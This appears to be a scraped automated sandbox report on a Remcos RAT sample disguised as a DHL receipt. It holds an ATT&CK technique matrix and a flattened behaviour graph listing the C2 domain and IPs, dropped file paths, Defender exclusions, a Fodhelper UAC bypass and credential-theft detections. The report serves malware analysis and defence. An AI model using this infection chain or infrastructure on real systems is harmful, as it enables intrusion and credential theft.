              System Owner/User Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job522
              Process Injection              		1
              Deobfuscate/Decode Files or Information              		Proc Filesystem1
              Network Share Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Abuse Elevation Control Mechanism              		/etc/passwd and /etc/shadow1
              Query Registry              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
              Obfuscated Files or Information              		Network Sniffing271
              Security Software Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
              Bypass User Account Control              		Input Capture41
              Virtualization/Sandbox Evasion              		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task41
              Virtualization/Sandbox Evasion              		Keylogging4
              Process Discovery              		Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
              Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers11
              Access Token Manipulation              		GUI Input Capture1
              Application Window Discovery              		Replication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
              Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job522
              Process Injection              		Web Portal Capture1
              Remote System Discovery              		Component Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
              Identify Business TempoBotnetHardware AdditionsPythonHypervisorProcess InjectionLNK Icon SmugglingCredential API Hooking1
              System Network Configuration Discovery              		Exploitation of Remote ServicesRemote Email CollectionExternal ProxyTransfer Data to Cloud AccountReflection Amplification

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1471440 Sample: DHL119040 receipt document,... Startdate: 11/07/2024 Architecture: WINDOWS Score: 100 92 jantasagasa.duckdns.org 2->92 94 ppeppa.db.files.1drv.com 2->94 96 7 other IPs or domains 2->96 120 Snort IDS alert for network traffic 2->120 122 Found malware configuration 2->122 124 Malicious sample detected (through community Yara rule) 2->124 128 24 other signatures 2->128 12 DHL119040 receipt document,pdf.exe 3 8 2->12         started        17 remcos.exe 2->17         started        19 remcos.exe 2->19         started        21 SystemSettingsAdminFlows.exe 2->21         started        signatures3 126 Uses dynamic DNS services 92->126 process4 dnsIp5 104 dual-spov-0006.spov-msedge.net 13.107.137.11, 443, 49730, 49731 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 12->104 106 l-0003.l-dc-msedge.net 13.107.43.12, 443, 49732, 49735 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 12->106 84 C:\Users\Public\Libraries\yfkwifxL.pif, PE32 12->84 dropped 86 C:\ProgramData\Remcos\remcos.exe, PE32 12->86 dropped 88 C:\Users\Public\Lxfiwkfy.url, MS 12->88 dropped 90 C:\ProgramData\...\remcos.exe:Zone.Identifier, ASCII 12->90 dropped 162 Detected Remcos RAT 12->162 164 Creates autostart registry keys with suspicious names 12->164 166 Creates multiple autostart registry keys 12->166 168 3 other signatures 12->168 23 yfkwifxL.pif 8 12->23         started        27 remcos.exe 3 18 12->27         started        30 extrac32.exe 12->30         started        file6 signatures7 process8 dnsIp9 74 C:\Users\user\AppData\Local\Temp\...\971F.bat, ASCII 23->74 dropped 140 Detected unpacking (changes PE section rights) 23->140 32 cmd.exe 1 23->32         started        100 jantasagasa.duckdns.org 23.227.203.18, 44577, 49736, 49737 HVC-ASUS United States 27->100 102 geoplugin.net 178.237.33.50, 49740, 80 ATOM86-ASATOM86NL Netherlands 27->102 76 C:\ProgramData\trhrth\logs.dat, data 27->76 dropped 142 Detected Remcos RAT 27->142 144 Contains functionalty to change the wallpaper 27->144 146 Contains functionality to inject code into remote processes 27->146 148 4 other signatures 27->148 35 remcos.exe 27->35         started        37 remcos.exe 27->37         started        39 remcos.exe 27->39         started        41 conhost.exe 27->41         started        file10 signatures11 process12 signatures13 108 Drops executables to the windows directory (C:\Windows) and starts them 32->108 110 Adds a directory exclusion to Windows Defender 32->110 43 alpha.exe 32->43         started        46 alpha.exe 2 32->46         started        48 extrac32.exe 1 32->48         started        51 15 other processes 32->51 112 Tries to steal Instant Messenger accounts or passwords 35->112 114 Tries to steal Mail credentials (via file / registry access) 35->114 116 Tries to harvest and steal browser information (history, passwords, etc) 37->116 process14 file15 150 Adds a directory exclusion to Windows Defender 43->150 53 xkn.exe 43->53         started        152 Uses ping.exe to sleep 46->152 154 Uses ping.exe to check the status of other devices and networks 46->154 72 C:\Users\Public\alpha.exe, PE32+ 48->72 dropped 156 Drops PE files to the user root directory 48->156 158 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 48->158 160 Opens network shares 51->160 56 PING.EXE 51->56         started        59 extrac32.exe 1 51->59         started        62 extrac32.exe 51->62         started        64 2 other processes 51->64 signatures16 process17 dnsIp18 130 Powershell is started from unusual location (likely to bypass HIPS) 53->130 132 Adds a directory exclusion to Windows Defender 53->132 134 Reads the Security eventlog 53->134 136 Reads the System eventlog 53->136 66 alpha.exe 53->66         started        98 127.0.0.1 unknown unknown 56->98 78 C:\Users\Public\ger.exe, PE32+ 59->78 dropped 80 C:\Users\Public\xkn.exe, PE32+ 62->80 dropped 82 C:\Windows \System32\per.exe, PE32+ 64->82 dropped file19 signatures20 process21 signatures22 118 Adds a directory exclusion to Windows Defender 66->118 69 ger.exe 66->69         started        process23 signatures24 138 UAC bypass detected (Fodhelper) 69->138

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.